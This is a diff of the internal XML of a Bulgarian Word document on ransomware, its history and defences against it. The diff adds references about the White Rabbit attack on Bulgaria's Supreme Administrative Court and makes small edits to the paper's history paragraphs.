               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12177,7 +12251,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12216,14 +12290,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>B. Robb, „AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals,“ BlackFog, 24 06 2025. [Онлайн]. Available: https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals.</w:t>
+                  <w:t>„Човешка грешка пуснала "Белия заек" да хакне системата на ВАС,“ СЕГА, 30 01 2025. [Онлайн]. Available: https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12262,14 +12336,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„Spring Security Crypto Module,“ Spring, [Онлайн]. Available: https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html.</w:t>
+                  <w:t>„„Бял заек“ атакувал ВАС. Как е допунат сривът?,“ FrogNews, 2025 01 30. [Онлайн]. Available: https://frognews.bg/novini/bial-zaek-atakuval-vas-kak-dopunat-srivat.html.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12308,6 +12382,145 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
+                  <w:t>„Бял заек Ransomware,“ EnigmaSoft, [Онлайн]. Available: https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/.</w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+          </w:tr>
+          <w:tr>
+            <w:trPr>
+              <w:divId w:val="213932172"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+            </w:trPr>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="50" w:type="pct"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t xml:space="preserve">[12] </w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="0" w:type="auto"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t>B. Robb, „AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals,“ BlackFog, 24 06 2025. [Онлайн]. Available: https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals.</w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+          </w:tr>
+          <w:tr>
+            <w:trPr>
+              <w:divId w:val="213932172"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+            </w:trPr>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="50" w:type="pct"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t xml:space="preserve">[13] </w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="0" w:type="auto"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t>„Spring Security Crypto Module,“ Spring, [Онлайн]. Available: https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html.</w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+          </w:tr>
+          <w:tr>
+            <w:trPr>
+              <w:divId w:val="213932172"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+            </w:trPr>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="50" w:type="pct"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:lastRenderedPageBreak/>
+                  <w:t xml:space="preserve">[14] </w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="0" w:type="auto"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
                   <w:t>C. M. University, „Social Engineering,“ [Онлайн]. Available: https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html.</w:t>
                 </w:r>
               </w:p>
@@ -12316,7 +12529,7 @@
         </w:tbl>
         <w:p>
           <w:pPr>
-            <w:divId w:val="724986744"/>
+            <w:divId w:val="213932172"/>
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
               <w:noProof/>
@@ -14234,7 +14447,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -15078,15 +15290,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -15281,6 +15484,15 @@
 </ct:contentTypeSchema>
 </file>
 
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
   <documentManagement>
@@ -15413,7 +15625,7 @@
       </b:Author>
     </b:Author>
     <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
-    <b:RefOrder>11</b:RefOrder>
+    <b:RefOrder>13</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Bre25</b:Tag>
@@ -15435,7 +15647,7 @@
     <b:Month>06</b:Month>
     <b:Day>24</b:Day>
     <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
-    <b:RefOrder>9</b:RefOrder>
+    <b:RefOrder>11</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Spr</b:Tag>
@@ -15444,20 +15656,33 @@
     <b:Title>Spring Security Crypto Module</b:Title>
     <b:ProductionCompany>Spring</b:ProductionCompany>
     <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
+    <b:RefOrder>12</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Бял</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
+    <b:Title>Бял заек Ransomware</b:Title>
+    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
+    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
     <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
+    <b:Tag>Чов25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
+    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
+    <b:ProductionCompany>СЕГА</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>01</b:Month>
+    <b:Day>30</b:Day>
+    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
+    <b:RefOrder>9</b:RefOrder>
   </b:Source>
 </b:Sources>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -15476,6 +15701,14 @@
 </ds:datastoreItem>
 </file>
 
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
@@ -15487,7 +15720,7 @@
 </file>
 
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1B5A900D-9C4B-489C-9127-E3B977EAB9EC}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -297,59 +297,7 @@
           <w:szCs w:val="48"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Какво представлява </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">? Стратегии и защита от </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Какво представлява ransomware? Стратегии и защита от ransomware.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2779,7 +2727,10 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t>Откуп, комбиниран с злоупотреба с лични данни се нарича</w:t>
+        <w:t>Паричен о</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ткуп, комбиниран с злоупотреба с лични данни се нарича</w:t>
       </w:r>
       <w:r>
         <w:t>:</w:t>
@@ -2841,15 +2792,7 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) могат сериозно да нарушат бизнес процесите. </w:t>
+        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (ransomware) могат сериозно да нарушат бизнес процесите. </w:t>
       </w:r>
       <w:r>
         <w:t>Компаниите</w:t>
@@ -2903,15 +2846,7 @@
         <w:t xml:space="preserve">след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Щетите от </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> атака рядко приключват с възстановяването на системите – последиците могат да се усещат дълго след това.</w:t>
+        <w:t>Щетите от ransomware атака рядко приключват с възстановяването на системите – последиците могат да се усещат дълго след това.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3076,15 +3011,6 @@
           </w:r>
         </w:sdtContent>
       </w:sdt>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3122,13 +3048,8 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> може да изглежда като съвременна заплаха, но идеята за кражба на данни, ограничаване на достъпа и искане на откуп съществува от десетилетия.</w:t>
+      <w:r>
+        <w:t>Ransomware може да изглежда като съвременна заплаха, но идеята за кражба на данни, ограничаване на достъпа и искане на откуп съществува от десетилетия.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3273,14 +3194,32 @@
       <w:r>
         <w:t xml:space="preserve">Появата на биткойна и криптовалутите променят това. </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
       <w:r>
         <w:t>Криптовалутите са л</w:t>
       </w:r>
       <w:r>
-        <w:t>есен и удобен начин за получаване на крупната сума от потърпевшия</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, тъй като са трудно проследими.</w:t>
+        <w:t>есен и удобен начин за получаване на сума</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> от потърпевшия</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">защото </w:t>
+      </w:r>
+      <w:r>
+        <w:t>са трудно проследими.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> При традиционното банкиране участниците са ясно идентифицирани – име, банка, </w:t>
@@ -3394,7 +3333,13 @@
         <w:t xml:space="preserve"> видеоконференции, </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">на които са показвали на засегнатите как </w:t>
+        <w:t>на които са показвали</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на засегнатите как </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">да </w:t>
@@ -3422,29 +3367,18 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">, което бележи повратен момент в развитието на </w:t>
+        <w:t xml:space="preserve">, което бележи повратен момент в развитието на ransomware. Този нов вид изнудващ зловреден софтуер използва плащания чрез </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ransomware</w:t>
+        <w:t>Bitcoin</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">. Този нов вид изнудващ зловреден софтуер използва плащания чрез </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Bitcoin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
         <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>За целта са прилагани 2048-bit RSA двойк</w:t>
+        <w:t xml:space="preserve"> За целта са прилагани 2048-bit RSA двойк</w:t>
       </w:r>
       <w:r>
         <w:t>а</w:t>
@@ -3548,7 +3482,13 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t>Първичната форма на софтуера за изнудване е, както вече споменахме, инфектирани флопи</w:t>
+        <w:t>Първичната форма на софтуера за изнудване е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> чрез</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> инфектирани флопи</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -3791,27 +3731,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3910,6 +3837,9 @@
       <w:r>
         <w:t xml:space="preserve"> Към вирусите се прилагат по-силни криптиращи алгоритми. </w:t>
       </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3923,6 +3853,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> Trojan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> е първият вирус</w:t>
@@ -4045,27 +3978,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4314,6 +4234,9 @@
       <w:r>
         <w:tab/>
       </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4327,6 +4250,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> Trojan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> криптира всичко в </w:t>
@@ -4481,27 +4407,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4602,13 +4515,16 @@
         <w:t xml:space="preserve">на вируси или изпращане на определена сума </w:t>
       </w:r>
       <w:r>
-        <w:t>капитал</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> до престъпниците</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Постигат </w:t>
+        <w:t>до престъпниците</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Те п</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">остигат </w:t>
       </w:r>
       <w:r>
         <w:t>целите си</w:t>
@@ -4699,6 +4615,9 @@
         </w:rPr>
         <w:t xml:space="preserve">spear phishing ransomware. </w:t>
       </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4708,6 +4627,9 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> се разпространява през електронни пощи като прикачен файл под формата на заявление за работа. </w:t>
       </w:r>
       <w:r>
@@ -4717,7 +4639,13 @@
         <w:t xml:space="preserve"> тапета на десктопа</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, като е изписано съобщението, че системата е пробита и че е прикачен файл с инструкции (фиг. </w:t>
+        <w:t xml:space="preserve">, като </w:t>
+      </w:r>
+      <w:r>
+        <w:t>визуализира</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> съобщение, че системата е пробита и е прикачен файл с инструкции (фиг. </w:t>
       </w:r>
       <w:r>
         <w:t>4</w:t>
@@ -4782,6 +4710,9 @@
       <w:r>
         <w:t xml:space="preserve">Първите версии на </w:t>
       </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4791,10 +4722,16 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> използват симетрично криптиране, където </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">ключът за криптиране и декриптиране е един и същ. Това го прави лесен за разбиване. Друг недостатък на първоначалния </w:t>
+        <w:t xml:space="preserve">ключът за криптиране и декриптиране е един и същ. Друг недостатък на първоначалния </w:t>
+      </w:r>
+      <w:r>
+        <w:t>„</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4816,6 +4753,9 @@
         <w:t>Code</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4951,27 +4891,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5073,27 +5000,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5161,6 +5075,9 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:r>
